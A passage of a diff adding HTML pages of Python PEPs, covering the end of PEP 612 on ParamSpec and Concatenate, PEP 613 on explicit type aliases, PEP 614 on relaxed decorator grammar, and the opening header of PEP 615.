+  async def inner(*args: P.args, **kwargs: P.kwargs) -> R:
+    await log_to_database()
+    return f(*args, **kwargs)
+  return inner
+
+@add_logging
+def takes_int_str(x: int, y: str) -> int:
+  return x + 7
+
+await takes_int_str(1, "A") # Accepted
+await takes_int_str("B", 2) # Correctly rejected by the type checker
+
+
+

Another common decorator pattern that has previously been impossible to type is +the practice of adding or removing arguments from the decorated function. For +example:

+
class Request:
+  ...
+
+def with_request(f: Callable[..., R]) -> Callable[..., R]:
+  def inner(*args: object, **kwargs: object) -> R:
+    return f(Request(), *args, **kwargs)
+  return inner
+
+@with_request
+def takes_int_str(request: Request, x: int, y: str) -> int:
+  # use request
+  return x + 7
+
+takes_int_str(1, "A")
+takes_int_str("B", 2) # fails at runtime
+
+
+

With the addition of the Concatenate operator from this PEP, we can even +type this more complex decorator.

+
from typing import Concatenate
+
+def with_request(f: Callable[Concatenate[Request, P], R]) -> Callable[P, R]:
+  def inner(*args: P.args, **kwargs: P.kwargs) -> R:
+    return f(Request(), *args, **kwargs)
+  return inner
+
+@with_request
+def takes_int_str(request: Request, x: int, y: str) -> int:
+  # use request
+  return x + 7
+
+takes_int_str(1, "A") # Accepted
+takes_int_str("B", 2) # Correctly rejected by the type checker
+
+
+
+
+

Specification

+
+

ParamSpec Variables

+
+

Declaration

+

A parameter specification variable is defined in a similar manner to how a +normal type variable is defined with typing.TypeVar.

+
from typing import ParamSpec
+P = ParamSpec("P")         # Accepted
+P = ParamSpec("WrongName") # Rejected because P =/= WrongName
+
+
+

The runtime should accept bounds and covariant and contravariant +arguments in the declaration just as typing.TypeVar does, but for now we +will defer the standardization of the semantics of those options to a later PEP.

+
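
For illustration only (not part of the specification; the variable names here are invented), such declarations might look like:

+
from typing import Callable, ParamSpec
+
+# Accepted at runtime, mirroring typing.TypeVar; type checkers are not
+# yet required to assign these options any meaning.
+P_bound = ParamSpec("P_bound", bound=Callable[..., int])
+P_co = ParamSpec("P_co", covariant=True)
+P_contra = ParamSpec("P_contra", contravariant=True)
+
+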
+
+

Valid use locations

+

Previously only a list of parameter arguments ([A, B, C]) or an ellipsis +(signifying “undefined parameters”) were acceptable as the first “argument” to +typing.Callable . We now augment that with two new options: a parameter +specification variable (Callable[P, int]) or a concatenation on a +parameter specification variable (Callable[Concatenate[int, P], int]).

+
callable ::= Callable "[" parameters_expression, type_expression "]"
+
+parameters_expression ::=
+  | "..."
+  | "[" [ type_expression ("," type_expression)* ] "]"
+  | parameter_specification_variable
+  | concatenate "["
+                   type_expression ("," type_expression)* ","
+                   parameter_specification_variable
+                "]"
+
+
+

where parameter_specification_variable is a typing.ParamSpec variable, +declared in the manner as defined above, and concatenate is +typing.Concatenate.

+

As before, parameters_expressions by themselves are not acceptable in +places where a type is expected:

+
def foo(x: P) -> P: ...                           # Rejected
+def foo(x: Concatenate[int, P]) -> int: ...       # Rejected
+def foo(x: typing.List[P]) -> None: ...           # Rejected
+def foo(x: Callable[[int, str], P]) -> None: ...  # Rejected
+
+
+
+
+

User-Defined Generic Classes

+

Just as defining a class as inheriting from Generic[T] makes a class generic +for a single parameter (when T is a TypeVar), defining a class as +inheriting from Generic[P] makes a class generic on +parameters_expressions (when P is a ParamSpec).

+
T = TypeVar("T")
+P_2 = ParamSpec("P_2")
+
+class X(Generic[T, P]):
+  f: Callable[P, int]
+  x: T
+
+def f(x: X[int, P_2]) -> str: ...                    # Accepted
+def f(x: X[int, Concatenate[int, P_2]]) -> str: ...  # Accepted
+def f(x: X[int, [int, bool]]) -> str: ...            # Accepted
+def f(x: X[int, ...]) -> str: ...                    # Accepted
+def f(x: X[int, int]) -> str: ...                    # Rejected
+
+
+

By the rules defined above, spelling a concrete instance of a class generic +with respect to only a single ParamSpec would require unsightly double +brackets. For aesthetic purposes we allow these to be omitted.

+
class Z(Generic[P]):
+  f: Callable[P, int]
+
+def f(x: Z[[int, str, bool]]) -> str: ...   # Accepted
+def f(x: Z[int, str, bool]) -> str: ...     # Equivalent
+
+# Both Z[[int, str, bool]] and Z[int, str, bool] express this:
+class Z_instantiated:
+  f: Callable[[int, str, bool], int]
+
+
+
+
+

Semantics

+

The inference rules for the return type of a function invocation whose signature +contains a ParamSpec variable are analogous to those around +evaluating ones with TypeVars.

+
def changes_return_type_to_str(x: Callable[P, int]) -> Callable[P, str]: ...
+
+def returns_int(a: str, b: bool) -> int: ...
+
+f = changes_return_type_to_str(returns_int) # f should have the type:
+                                            # (a: str, b: bool) -> str
+
+f("A", True)               # Accepted
+f(a="A", b=True)           # Accepted
+f("A", "A")                # Rejected
+
+expects_str(f("A", True))  # Accepted
+expects_int(f("A", True))  # Rejected
+
+
+

Just as with traditional TypeVars, a user may include the same +ParamSpec multiple times in the arguments of the same function, +to indicate a dependency between multiple arguments. In these cases a type +checker may choose to solve to a common behavioral supertype (i.e. a set of +parameters for which all of the valid calls are valid in both of the subtypes), +but is not obligated to do so.

+
P = ParamSpec("P")
+
+def foo(x: Callable[P, int], y: Callable[P, int]) -> Callable[P, bool]: ...
+
+def x_y(x: int, y: str) -> int: ...
+def y_x(y: int, x: str) -> int: ...
+
+foo(x_y, x_y)  # Should return (x: int, y: str) -> bool
+
+foo(x_y, y_x)  # Could return (__a: int, __b: str) -> bool
+               # This works because both callables have types that are
+               # behavioral subtypes of Callable[[int, str], int]
+
+
+def keyword_only_x(*, x: int) -> int: ...
+def keyword_only_y(*, y: int) -> int: ...
+foo(keyword_only_x, keyword_only_y) # Rejected
+
+
+

The constructors of user-defined classes generic on ParamSpecs should be +evaluated in the same way.

+
U = TypeVar("U")
+
+class Y(Generic[U, P]):
+  f: Callable[P, str]
+  prop: U
+
+  def __init__(self, f: Callable[P, str], prop: U) -> None:
+    self.f = f
+    self.prop = prop
+
+def a(q: int) -> str: ...
+
+Y(a, 1)   # Should resolve to Y[(q: int), int]
+Y(a, 1).f # Should resolve to (q: int) -> str
+
+
+

The semantics of Concatenate[X, Y, P] are that it represents the parameters +represented by P with two positional-only parameters prepended. This means +that we can use it to represent higher order functions that add, remove or +transform a finite number of parameters of a callable.

+
def bar(x: int, *args: bool) -> int: ...
+
+def add(x: Callable[P, int]) -> Callable[Concatenate[str, P], bool]: ...
+
+add(bar)       # Should return (__a: str, x: int, *args: bool) -> bool
+
+def remove(x: Callable[Concatenate[int, P], int]) -> Callable[P, bool]: ...
+
+remove(bar)    # Should return (*args: bool) -> bool
+
+def transform(
+  x: Callable[Concatenate[int, P], int]
+) -> Callable[Concatenate[str, P], bool]: ...
+
+transform(bar) # Should return (__a: str, *args: bool) -> bool
+
+
+

This also means that while any function that returns an R can satisfy +typing.Callable[P, R], only functions that can be called positionally in +their first position with a X can satisfy +typing.Callable[Concatenate[X, P], R].

+
def expects_int_first(x: Callable[Concatenate[int, P], int]) -> None: ...
+
+@expects_int_first # Rejected
+def one(x: str) -> int: ...
+
+@expects_int_first # Rejected
+def two(*, x: int) -> int: ...
+
+@expects_int_first # Rejected
+def three(**kwargs: int) -> int: ...
+
+@expects_int_first # Accepted
+def four(*args: int) -> int: ...
+
+
+

There are still some classes of decorators not supported by these +features:

+
    +
  • those that add/remove/change a variable number of parameters (for +example, functools.partial will remain untypable even after this PEP)
  • +
  • those that add/remove/change keyword-only parameters (See +Concatenating Keyword Parameters for more details).
  • +
+
+
+
+

The components of a ParamSpec

+

A ParamSpec captures both positional and keyword accessible +parameters, but there unfortunately is no object in the runtime that captures +both of these together. Instead, we are forced to separate them into *args +and **kwargs, respectively. This means we need to be able to split apart +a single ParamSpec into these two components, and then bring +them back together into a call. To do this, we introduce P.args to +represent the tuple of positional arguments in a given call and +P.kwargs to represent the corresponding Mapping of keywords to +values.

+
+

Valid use locations

+

These “properties” can only be used as the annotated types for +*args and **kwargs, accessed from a ParamSpec already in scope.

+
def puts_p_into_scope(f: Callable[P, int]) -> None:
+
+  def inner(*args: P.args, **kwargs: P.kwargs) -> None:      # Accepted
+    pass
+
+  def mixed_up(*args: P.kwargs, **kwargs: P.args) -> None:   # Rejected
+    pass
+
+  def misplaced(x: P.args) -> None:                          # Rejected
+    pass
+
+def out_of_scope(*args: P.args, **kwargs: P.kwargs) -> None: # Rejected
+  pass
+
+
+

Furthermore, because the default kind of parameter in Python ((x: int)) +may be addressed both positionally and through its name, two valid invocations +of a (*args: P.args, **kwargs: P.kwargs) function may give different +partitions of the same set of parameters. Therefore, we need to make sure that +these special types are only brought into the world together, and are used +together, so that our usage is valid for all possible partitions.

+
def puts_p_into_scope(f: Callable[P, int]) -> None:
+
+  stored_args: P.args                           # Rejected
+
+  stored_kwargs: P.kwargs                       # Rejected
+
+  def just_args(*args: P.args) -> None:         # Rejected
+    pass
+
+  def just_kwargs(**kwargs: P.kwargs) -> None:  # Rejected
+    pass
+
+
+
+
+

Semantics

+

With those requirements met, we can now take advantage of the unique properties +afforded to us by this setup:

+
    +
  • Inside the function, args has the type P.args, not +Tuple[P.args, ...] as would be with a normal annotation +(and likewise with the **kwargs)
      +
    • This special case is necessary to encapsulate the heterogeneous contents +of the args/kwargs of a given call, which cannot be expressed +by an indefinite tuple/dictionary type.
    • +
    +
  • +
  • A function of type Callable[P, R] can be called with (*args, **kwargs) +if and only if args has the type P.args and kwargs has the type +P.kwargs, and that those types both originated from the same function +declaration.
  • +
  • A function declared as def inner(*args: P.args, **kwargs: P.kwargs) -> X +has type Callable[P, X].
  • +
+

With these three properties, we now have the ability to fully type check +parameter preserving decorators.

+
def decorator(f: Callable[P, int]) -> Callable[P, None]:
+
+  def foo(*args: P.args, **kwargs: P.kwargs) -> None:
+
+    f(*args, **kwargs)    # Accepted, should resolve to int
+
+    f(*kwargs, **args)    # Rejected
+
+    f(1, *args, **kwargs) # Rejected
+
+  return foo              # Accepted
+
+
+

To extend this to include Concatenate, we declare the following properties:

+
    +
  • A function of type Callable[Concatenate[A, B, P], R] can only be +called with (a, b, *args, **kwargs) when args and kwargs are the +respective components of P, a is of type A and b is of +type B.
  • +
  • A function declared as +def inner(a: A, b: B, *args: P.args, **kwargs: P.kwargs) -> R +has type Callable[Concatenate[A, B, P], R]. Placing keyword-only +parameters between the *args and **kwargs is forbidden.
  • +
+
def add(f: Callable[P, int]) -> Callable[Concatenate[str, P], None]:
+
+  def foo(s: str, *args: P.args, **kwargs: P.kwargs) -> None:  # Accepted
+    pass
+
+  def bar(*args: P.args, s: str, **kwargs: P.kwargs) -> None:  # Rejected
+    pass
+
+  return foo                                                   # Accepted
+
+
+def remove(f: Callable[Concatenate[int, P], int]) -> Callable[P, None]:
+
+  def foo(*args: P.args, **kwargs: P.kwargs) -> None:
+    f(1, *args, **kwargs) # Accepted
+
+    f(*args, 1, **kwargs) # Rejected
+
+    f(*args, **kwargs)    # Rejected
+
+  return foo
+
+
+

Note that the names of the parameters preceding the ParamSpec +components are not mentioned in the resulting Concatenate. This means that +these parameters can not be addressed via a named argument:

+
def outer(f: Callable[P, None]) -> Callable[P, None]:
+  def foo(x: int, *args: P.args, **kwargs: P.kwargs) -> None:
+    f(*args, **kwargs)
+
+  def bar(*args: P.args, **kwargs: P.kwargs) -> None:
+    foo(1, *args, **kwargs)   # Accepted
+    foo(x=1, *args, **kwargs) # Rejected
+
+  return bar
+
+
+

This is not an implementation convenience, but a soundness requirement. If we +were to allow that second calling style, then the following snippet would be +problematic.

+
@outer
+def problem(*, x: object) -> None:
+  pass
+
+problem(x="uh-oh")
+
+
+

Inside of bar, we would get +TypeError: foo() got multiple values for argument 'x'. Requiring these +concatenated arguments to be addressed positionally avoids this kind of problem, +and simplifies the syntax for spelling these types. Note that this is also why we +have to reject signatures of the form +(*args: P.args, s: str, **kwargs: P.kwargs) (See +Concatenating Keyword Parameters for more details).

+

If one of these prepended positional parameters contains a free ParamSpec, +we consider that variable in scope for the purposes of extracting the components +of that ParamSpec. That allows us to spell things like this:

+
def twice(f: Callable[P, int], *args: P.args, **kwargs: P.kwargs) -> int:
+  return f(*args, **kwargs) + f(*args, **kwargs)
+
+
+

The type of twice in the above example is +Callable[Concatenate[Callable[P, int], P], int], where P is bound by the +outer Callable. This has the following semantics:

+
def a_int_b_str(a: int, b: str) -> int:
+  pass
+
+twice(a_int_b_str, 1, "A")       # Accepted
+
+twice(a_int_b_str, b="A", a=1)   # Accepted
+
+twice(a_int_b_str, "A", 1)       # Rejected
+
+
+
+
+
+
+

Backwards Compatibility

+

The only changes necessary to existing features in typing is allowing these +ParamSpec and Concatenate objects to be the first parameter to +Callable and to be a parameter to Generic. Currently Callable +expects a list of types there and Generic expects single types, so they are +currently mutually exclusive. Otherwise, existing code that doesn’t reference +the new interfaces will be unaffected.

+
+
+

Reference Implementation

+

The Pyre type checker supports all of the behavior +described above. A reference implementation of the runtime components needed +for those uses is provided in the pyre_extensions module. A reference +implementation for CPython can be found +here.

+
+
+

Rejected Alternatives

+
+

Using List Variadics and Map Variadics

+

We considered just trying to make something like this with a callback protocol +which was parameterized on a list-type variadic, and a map-type variadic like +so:

+
R = typing.TypeVar("R")
+Tpositionals = ...
+Tkeywords = ...
+class BetterCallable(typing.Protocol[Tpositionals, Tkeywords, R]):
+  def __call__(*args: Tpositionals, **kwargs: Tkeywords) -> R: ...
+
+
+

However, there are some problems with trying to come up with a consistent +solution for those type variables for a given callable. This problem comes up +with even the simplest of callables:

+
def simple(x: int) -> None: ...
+simple <: BetterCallable[[int], [], None]
+simple <: BetterCallable[[], {"x": int}, None]
+BetterCallable[[int], [], None] </: BetterCallable[[], {"x": int}, None]
+
+
+

Any time where a type can implement a protocol in more than one way that aren’t +mutually compatible, we can run into situations where we lose information. If we +were to make a decorator using this protocol, we would have to pick one calling +convention to prefer.

+
def decorator(
+  f: BetterCallable[[Ts], [Tmap], int],
+) -> BetterCallable[[Ts], [Tmap], str]:
+  def decorated(*args: Ts, **kwargs: Tmap) -> str:
+    x = f(*args, **kwargs)
+    return int_to_str(x)
+  return decorated
+
+@decorator
+def foo(x: int) -> int:
+  return x
+
+reveal_type(foo) # Option A: BetterCallable[[int], {}, str]
+                 # Option B: BetterCallable[[], {x: int}, str]
+foo(7)   # fails under option B
+foo(x=7) # fails under option A
+
+
+

The core problem here is that, by default, parameters in Python can either be +called positionally or as a keyword argument. This means we really have +three categories (positional-only, positional-or-keyword, keyword-only) we’re +trying to jam into two categories. This is the same problem that we briefly +mentioned when discussing .args and .kwargs. Fundamentally, in order to +capture two categories when there are some things that can be in either +category, we need a higher level primitive (ParamSpec) to +capture all three, and then split them out afterward.

+
+
+

Defining ParametersOf

+

Another proposal we considered was defining ParametersOf and ReturnType +operators which would operate on a domain of a newly defined Function type. +Function would be callable with, and only with ParametersOf[F]. +ParametersOf and ReturnType would only operate on type variables with +precisely this bound. The combination of these three features could express +everything that we can express with ParamSpecs.

+
F = TypeVar("F", bound=Function)
+
+def no_change(f: F) -> F:
+  def inner(
+    *args: ParametersOf[F].args,
+    **kwargs: ParametersOf[F].kwargs
+  ) -> ReturnType[F]:
+    return f(*args, **kwargs)
+  return inner
+
+def wrapping(f: F) -> Callable[ParametersOf[F], List[ReturnType[F]]]:
+  def inner(
+    *args: ParametersOf[F].args,
+    **kwargs: ParametersOf[F].kwargs
+  ) -> List[ReturnType[F]]:
+    return [f(*args, **kwargs)]
+  return inner
+
+def unwrapping(
+  f: Callable[ParametersOf[F], List[R]]
+) -> Callable[ParametersOf[F], R]:
+  def inner(
+    *args: ParametersOf[F].args,
+    **kwargs: ParametersOf[F].kwargs
+  ) -> R:
+    return f(*args, **kwargs)[0]
+  return inner
+
+
+

We decided to go with ParamSpecs over this approach for several reasons:

+
    +
  • The footprint of this change would be larger, as we would need two new +operators, and a new type, while ParamSpec just introduces a new variable.
  • +
  • Python typing has so far avoided supporting operators, whether +user-defined or built-in, in favor of destructuring. Accordingly, +ParamSpec based signatures look much more like existing Python.
  • +
  • The lack of user-defined operators makes common patterns hard to spell. +unwrapping is odd to read because F is not actually referring to any +callable. It’s just being used as a container for the parameters we wish to +propagate. It would read better if we could define an operator +RemoveList[List[X]] = X and then unwrapping could take F and +return Callable[ParametersOf[F], RemoveList[ReturnType[F]]]. Without +that, we unfortunately get into a situation where we have to use a +Function-variable as an improvised ParamSpec, in that we never +actually bind the return type.
  • +
+

In summary, between these two equivalently powerful syntaxes, ParamSpec fits +much more naturally into the status quo.

+
+
+

Concatenating Keyword Parameters

+

In principle the idea of concatenation as a means to modify a finite number of +positional parameters could be expanded to include keyword parameters.

+
def add_n(f: Callable[P, R]) -> Callable[Concatenate[("n", int), P], R]:
+  def inner(*args: P.args, n: int, **kwargs: P.kwargs) -> R:
+    # use n
+    return f(*args, **kwargs)
+  return inner
+
+
+

However, the key distinction is that while prepending positional-only parameters +to a valid callable type always yields another valid callable type, the same +cannot be said for adding keyword-only parameters. As alluded to above, the +issue is name collisions. The parameters Concatenate[("n", int), P] are +only valid when P itself does not already have a parameter named n.

+
def innocent_wrapper(f: Callable[P, R]) -> Callable[P, R]:
+  def inner(*args: P.args, **kwargs: P.kwargs) -> R:
+    added = add_n(f)
+    return added(*args, n=1, **kwargs)
+  return inner
+
+@innocent_wrapper
+def problem(n: int) -> None:
+  pass
+
+
+

Calling problem(2) works fine, but calling problem(n=2) leads to a +TypeError: problem() got multiple values for argument 'n' from the call to +added inside of innocent_wrapper.

+

This kind of situation could be avoided, and this kind of decorator could be +typed if we could reify the constraint that a set of parameters not contain +a certain name, with something like:

+
P_without_n = ParamSpec("P_without_n", banned_names=["n"])
+
+def add_n(
+  f: Callable[P_without_n, R]
+) -> Callable[Concatenate[("n", int), P_without_n], R]: ...
+
+
+

The call to add_n inside of innocent_wrapper could then be rejected +since the callable was not guaranteed not to already have a parameter named +n.

+

However, enforcing these constraints would require enough additional +implementation work that we judged this extension to be out of scope of this +PEP. Fortunately the design of ParamSpecs is such that we can return to +this idea later if there is sufficient demand.

+
+
+

Naming this a ParameterSpecification

+

We decided that ParameterSpecification was a little too long-winded for use +here, and that this style of abbreviated name made it look more like TypeVar.

+
+
+

Naming this an ArgSpec

+

We think that calling this a ParamSpec is more correct than +referring to it as an ArgSpec, since callables have parameters, +which are distinct from the arguments which are passed to them in a given call +site. A given binding for a ParamSpec is a set of function +parameters, not a call-site’s arguments.

+
+
+
+

Acknowledgements

+

Thanks to all of the members of the Pyre team for their comments on early drafts +of this PEP, and for their help with the reference implementation.

+

Thanks are also due to the whole Python typing community for their early +feedback on this idea at a Python typing meetup, leading directly to the much +more compact .args/.kwargs syntax.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0612.rst

+

Last modified: 2024-06-11 22:12:09 GMT

+ +
+ +
\ No newline at end of file diff --git a/pep-0613/index.html b/pep-0613/index.html new file mode 100644 index 00000000000..5b5245e503a --- /dev/null +++ b/pep-0613/index.html @@ -0,0 +1,335 @@ PEP 613 – Explicit Type Aliases | peps.python.org
+
+


+ + +
+
+
+

PEP 613 – Explicit Type Aliases

+
+
Author:
+
Shannon Zhu <szhu at fb.com>
+
Sponsor:
+
Guido van Rossum <guido at python.org>
+
Discussions-To:
+
Typing-SIG thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
21-Jan-2020
+
Python-Version:
+
3.10
+
Post-History:
+
21-Jan-2020
+
+
+
+
+
+

Attention

+

This PEP is a historical document: see Type aliases and +typing.TypeAlias for up-to-date specs and documentation. Canonical typing specs are maintained at the typing specs site; runtime typing behaviour is described in the CPython documentation.

+


+

See the typing specification update process for how to propose changes to the typing spec.

+
+
+

Abstract

+

Type aliases are user-specified types which may be as complex as any type hint, +and are specified with a simple variable assignment on a module top level.

+

This PEP formalizes a way to explicitly declare an assignment as a type alias.

+
+
+

Motivation

+

Type aliases are declared as top level variable assignments. +In PEP 484, +the distinction between a valid type alias and a global variable was implicitly +determined: if a top level assignment is unannotated, and the assigned value is +a valid type, then the name being assigned to is a valid type alias. Otherwise, +that name is simply a global value that cannot be used as a type hint.

+

These implicit type alias declaration rules create confusion when type aliases +involve forward references, invalid types, or violate other restrictions +enforced on type alias declaration. Because the distinction between an +unannotated value and a type alias is implicit, ambiguous or incorrect type +alias declarations implicitly default to a valid value assignment. This creates +expressions that are impossible to express as type aliases and punts error +diagnosis of malformed type aliases downstream.

+

The following examples each include an illustration of some of the suboptimal +or confusing behaviors resulting from existing implicit alias declarations. +We also introduce explicit aliases of the format TypeName: TypeAlias = Expression +here for the sake of comparison, but the syntax is discussed in further detail +in later sections.

+
+

Forward References:

+
MyType = "ClassName"
+def foo() -> MyType: ...
+
+
+

This code snippet should not error so long as ClassName is defined +later on. However, a type checker is forced to assume that MyType is a value +assignment rather than a type alias, and therefore may throw spurious errors +that (1) MyType is an unannotated global string, and (2) MyType +cannot be used as a return annotation because it is not a valid type.

+
MyType: TypeAlias = "ClassName"
+def foo() -> MyType: ...
+
+
+

Explicit aliases remove ambiguity so neither of the above errors will be +thrown. Additionally, if something is wrong with ClassName +(i.e., it’s not actually defined later), the type checker can throw an error.

+
+
+

Error Messaging:

+
MyType1 = InvalidType
+MyType2 = MyGeneric(int)  # i.e., intention was MyGeneric[int]
+
+
+

A type checker should warn on this code snippet that InvalidType is not +a valid type, and therefore cannot be used to annotate an expression or to +construct a type alias. Instead, type checkers are forced to throw spurious +errors that (1) MyType1 and MyType2 are global expressions missing +annotations, and (2) MyType1 and MyType2 are not valid types in any of +their usages across the codebase.

+
MyType1: TypeAlias = InvalidType
+MyType2: TypeAlias = MyGeneric(int)
+
+
+

With explicit aliases, the type checker has enough information to error on the +actual definition of the bad type alias, and explain why: that MyGeneric(int) +and InvalidType are not valid types. When the value expression is no longer +evaluated as a global value, unactionable type errors on all usages of MyType1 +and MyType2 across the codebase can be suppressed.

+
+
+

Scope Restrictions:

+
class Foo:
+  x = ClassName
+  y: TypeAlias = ClassName
+  z: Type[ClassName] = ClassName
+
+
+

Type aliases are valid within class scope, both implicitly (x) and +explicitly (y). If the line should be interpreted as a class +variable, it must be explicitly annotated (z).

+
x = ClassName
+def foo() -> None:
+  x = ClassName
+
+
+

The outer x is a valid type alias, but type checkers must error if the +inner x is ever used as a type because type aliases cannot be defined +inside of a function. +This is confusing because the alias declaration rule is not explicit, and because +a type error will not be thrown on the location of the inner type alias declaration +but rather on every one of its subsequent use cases.

+
x: TypeAlias = ClassName
+def foo() -> None:
+  x = ClassName
+def bar() -> None:
+  x: TypeAlias = ClassName
+
+
+

With explicit aliases, the outer assignment is still a valid type alias. +Inside foo, the inner assignment should be interpreted as x: Type[ClassName]. +Inside bar, the type checker should raise a clear error, communicating +to the author that type aliases cannot be defined inside a function.

+
+
+
+

Specification

+

The explicit alias declaration syntax clearly differentiates between the three +possible kinds of assignments: typed global expressions, untyped global +expressions, and type aliases. This avoids the existence of assignments that +break type checking when an annotation is added, and avoids classifying the +nature of the assignment based on the type of the value.

+

Implicit syntax (pre-existing):

+
x = 1  # untyped global expression
+x: int = 1  # typed global expression
+
+x = int  # type alias
+x: Type[int] = int  # typed global expression
+
+
+

Explicit syntax:

+
x = 1  # untyped global expression
+x: int = 1  # typed global expression
+
+x = int  # untyped global expression (see note below)
+x: Type[int] = int  # typed global expression
+
+x: TypeAlias = int  # type alias
+x: TypeAlias = "MyClass"  # type alias
+
+
+

Note: The examples above illustrate implicit and explicit alias declarations in +isolation. For the sake of backwards compatibility, type checkers should support +both simultaneously, meaning an untyped global expression x = int will +still be considered a valid type alias.

+
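
As a concrete illustration of that note (the alias names are invented here), a checker is expected to treat both of the following as aliases for int:

+
from typing import TypeAlias
+
+IntAlias = int                     # implicit alias; remains valid
+IntAliasExplicit: TypeAlias = int  # explicit alias introduced by this PEP
+
+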
+
+

Backwards Compatibility

+

Explicit aliases provide an alternative way to declare type aliases, but all +pre-existing code and old alias declarations will work as before.

+
+
+

Reference Implementation

+

The Pyre type checker supports explicit type +alias declarations.

+
+
+

Rejected Ideas

+

Some alternative syntaxes were considered for explicit aliases:

+
MyType: TypeAlias[int]
+
+
+

This looks a lot like an uninitialized variable.

+
MyType = TypeAlias[int]
+
+
+

Along with the option above, this format potentially adds confusion around +what the runtime value of MyType is.

+

In comparison, the chosen syntax option MyType: TypeAlias = int is +appealing because it still sticks with the MyType = int assignment +syntax, and adds some information for the type checker purely as an annotation.

+
+
+

Version History

+
    +
  • 2021-11-16
      +
    • Allow TypeAlias inside class scope
    • +
    +
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0613.rst

+

Last modified: 2024-06-11 22:12:09 GMT

+ +
+ +
\ No newline at end of file diff --git a/pep-0614/index.html b/pep-0614/index.html new file mode 100644 index 00000000000..2f6e298e833 --- /dev/null +++ b/pep-0614/index.html @@ -0,0 +1,326 @@ PEP 614 – Relaxing Grammar Restrictions On Decorators | peps.python.org
+
+


+ + +
+
+
+

PEP 614 – Relaxing Grammar Restrictions On Decorators

+
+
Author:
+
Brandt Bucher <brandt at python.org>
+
Sponsor:
+
Guido van Rossum <guido at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
10-Feb-2020
+
Python-Version:
+
3.9
+
Post-History:
+
11-Feb-2020, 18-Feb-2020, 03-Mar-2020
+
Resolution:
+
Python-Dev thread
+
+
+
+
+
+

Abstract

+

Python currently requires that all decorators consist of a dotted +name, optionally followed by a single call. This PEP proposes removing +these limitations and allowing decorators to be any valid expression.

+
+
+

Motivation

+

When decorators were first being introduced, Guido described +the motivation to limit their syntax as a preference, not a technical +requirement:

+
+
I have a gut feeling about this one. I’m not sure where it comes +from, but I have it… So while it would be quite easy to change +the syntax to @test in the future, I’d like to stick with +the more restricted form unless a real use case is presented where +allowing @test would increase readability.
+

While these limitations were rarely encountered in practice, BPO +issues and mailing list posts +have consistently surfaced over the years requesting that they be +removed. The most recent one +(which prompted this proposal) +contained a good example of code using the PyQt5 library that +would become more readable, idiomatic, and maintainable if the +existing restrictions were relaxed. Slightly modified:

+
buttons = [QPushButton(f'Button {i}') for i in range(10)]
+
+# Do stuff with the list of buttons...
+
+@buttons[0].clicked.connect
+def spam():
+    ...
+
+@buttons[1].clicked.connect
+def eggs():
+    ...
+
+# Do stuff with the list of buttons...
+
+
+

Currently, these decorations must be rewritten as something like:

+
button_0 = buttons[0]
+
+@button_0.clicked.connect
+def spam():
+    ...
+
+button_1 = buttons[1]
+
+@button_1.clicked.connect
+def eggs():
+    ...
+
+
+

Further, the current grammar is already loose enough that it’s trivial +to hack more complicated decorator expressions together. So rather +than disallow arbitrarily complex expressions, as intended, the +current restrictions only make them uglier and less efficient:

+
# Identity function hack:
+
+def _(x):
+    return x
+
+@_(buttons[0].clicked.connect)
+def spam():
+    ...
+
+# eval hack:
+
+@eval("buttons[1].clicked.connect")
+def eggs():
+    ...
+
+
+
+
+

Rationale

+
+

Allowing Any Expression

+

The decision to allow any valid expression (and not just relaxing +the current restrictions to allow, for example, subscripting) has +been considered as the next logical step in the evolution of decorator +grammar for quite some time. As Guido noted, +during yet another mailing list thread:

+
+
I don’t think it’s reasonable to constrain it less than it +currently is but more than a general expression.
+

Special-casing the grammar to allow some useful cases would only +complicate the current situation, and all but guarantee that the +process would repeat itself sometime in the future. Further, one +purpose of this grammatical change is to discourage the temptation to +use hacks like the eval and identity-function anti-patterns shown +above.

+

In short: if we’re removing somewhat arbitrary restrictions, we should +remove all of them.

+
+
+

What Counts As An “Expression”

+

Throughout this document, the word “expression” is used as defined in +the Python Language Reference. +This can be summarized as “anything that’s valid as a test in if, +elif, and while blocks”. This differs subtly from a perhaps +more popular definition, which can +be summarized as “anything that’s valid as string input to eval”.

+

This definition of “expression” is convenient in that it fits our +needs well, and reuses the allowed grammar of existing language +constructs. It has two subtle differences from the other definition:

+
+

Tuple Displays Must Be Parenthesized

+

This is based on an observation Guido made in the same email. +Continued immediately from above:

+
+
Though I wouldn’t allow commas– there’s no way that
@f, g
+def pooh(): ...
+
+
+

can make sense.

+
+

Indeed, it may even lead inexperienced readers to conclude that +several decorators are being applied, as if they were stacked. +Requiring parentheses here makes the (admittedly nonsensical) intent +clear without imposing further restrictions and grammar complications.

+
+
+

Named Expressions Need Not Be Parenthesized

+

Here, the choice of syntax is unambiguous. PEP 572 explains +why it requires parentheses around top-level expression statements:

+
+
This rule is included to simplify the choice for the user between +an assignment statement and an assignment expression – there is +no syntactic position where both are valid.
+

Since an assignment statement is not valid here, assignment +expressions should not be unnecessarily burdened with parentheses.

+
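
As a small illustration (not drawn from the PEP itself; deco is a hypothetical identity decorator defined for the example), the proposed grammar permits:

+
def deco(f):
+    return f
+
+@d := deco         # no parentheses required around the named expression
+def spam():
+    ...
+
+assert d is deco   # the binding created by := is visible afterwards
+
+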
+
+
+
+

Specification

+

The grammar for decorators is currently:

+
decorator: '@' dotted_name [ '(' [arglist] ')' ] NEWLINE
+
+
+

This PEP proposes that it be simplified to:

+
decorator: '@' namedexpr_test NEWLINE
+
+
+
+
+

Backwards Compatibility

+

This new grammar is fully backward-compatible with the existing +grammar.

+
+
+

How To Teach This

+

Decorators can continue to be taught as they always have; the average +Python programmer is likely unaware that the current restriction even +exists.

+
+
+

Reference Implementation

+

The author has written a CPython implementation.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0614.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file diff --git a/pep-0615/index.html b/pep-0615/index.html new file mode 100644 index 00000000000..f1e363f2884 --- /dev/null +++ b/pep-0615/index.html @@ -0,0 +1,1058 @@ PEP 615 – Support for the IANA Time Zone Database in the Standard Library | peps.python.org
+
+


+ + +
+
+
+

PEP 615 – Support for the IANA Time Zone Database in the Standard Library

+
+
Author:
+
Paul Ganssle <paul at ganssle.io>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
22-Feb-2020
+
Python-Version:
+
